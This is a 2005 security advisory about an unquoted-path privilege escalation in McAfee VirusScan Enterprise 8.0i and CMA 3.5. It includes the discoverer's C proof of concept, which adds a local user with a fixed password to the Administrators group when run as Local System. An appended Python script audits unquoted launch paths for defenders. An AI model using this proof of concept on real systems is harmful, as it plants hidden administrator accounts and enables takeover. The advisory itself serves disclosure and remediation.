McAfee VirusScan Bug in 'naPrdMgr.exe' Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID: 1015404
SecurityTracker URL: http://securitytracker.com/id/1015404
Date: Dec 23 2005
Impact: Execution of arbitrary code via local system, Root access via local system
Fix Available: Yes   Vendor Confirmed: Yes   Exploit Included: Yes
Version(s): Enterprise Version 8.0i Patch 11
A vulnerability was reported in McAfee VirusScan. A local user can gain elevated privileges on the target system.
The 'naPrdMgr.exe' process invokes a particular binary application (EntVUtil.EXE) in an unsafe manner. A local user can create a specially named file containing arbitrary code. When McAfee VirusScan attempts to invoke the application, the specially named file will be invoked instead and the arbitrary code will be executed with Local System privileges.
The software intends to run 'C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE', but because the path is passed unquoted it first attempts to run 'C:\Program.exe' and then 'C:\Program Files\Network.exe' before reaching the intended binary.
McAfee Common Management Agent 3.5 Patch 5 is also affected.
Reed Arvin discovered this vulnerability.
The original advisory is available at:
A local user can gain Local System privileges on the target system.
The vendor has issued a fixed version (Patch 12).
The vendor's knowledge base article (kb45256) is available at:
Vendor URL: www.mcafee.com/
Cause: Access control error
Underlying OS: Windows (Any)
Source Message Contents
Subject: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
( Original article: http://reedarvin.thearvins.com/20051222-01.html )
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/)
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:
- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT
The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run
C:\Program Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
The vendor has released knowledge base article kb45256 to address the issue.
Solution one from the vendor:
"This issue is resolved in Patch 12."
Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."
// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    // Locate the Windows directory so net.exe is run from system32
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );
    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );
    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );
    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );
    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
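The path-probing sequence the advisory describes (C:\Program.exe, then C:\Program Files\Network.exe, then the intended EntVUtil.EXE) is the documented CreateProcess rule for an unquoted program path containing spaces. The following added example, which is not part of the advisory or of any McAfee code, re-implements that rule in Python so a defender can enumerate the shadow locations a given launch string exposes, flag any that already exist on disk (a hijack indicator), and confirm that quoting the path removes them. It assumes the command line is passed with lpApplicationName NULL, which is when Windows applies this rule.

```python
import os
from typing import Callable, List, Tuple


def unquoted_path_candidates(cmdline: str) -> List[str]:
    """Executables CreateProcess tries, in order, for an unquoted program path:
    every whitespace boundary is a possible end of the path, and ".exe" is
    appended when that prefix has no extension.  A leading double quote makes
    the quoted string the only candidate."""
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end < 0:
            raise ValueError("unterminated quote in command line")
        return [cmdline[1:end]]
    tokens = cmdline.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        if "." not in last_component:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit_launch(cmdline: str,
                 exists: Callable[[str], bool] = os.path.exists
                 ) -> Tuple[str, List[str], List[str]]:
    """Return (intended_exe, shadow_paths, planted).  shadow_paths are tried
    before the intended binary and must stay non-creatable by unprivileged
    users; planted are those already present on disk and worth alerting on."""
    candidates = unquoted_path_candidates(cmdline)
    intended, shadows = candidates[-1], candidates[:-1]
    planted = [p for p in shadows if exists(p)]
    return intended, shadows, planted


def quote_program_path(path: str) -> str:
    """Caller-side fix: quoting the program path leaves a single candidate."""
    return '"' + path + '"'


if __name__ == "__main__":
    # Path from the advisory; run on a real host, exists() checks the disk.
    target = r"C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE"
    intended, shadows, planted = audit_launch(target)
    print("intended:", intended)
    print("shadow paths to lock down:", shadows)
    print("already planted:", planted or "none")
    print("quoted form probes only:", unquoted_path_candidates(quote_program_path(target)))
```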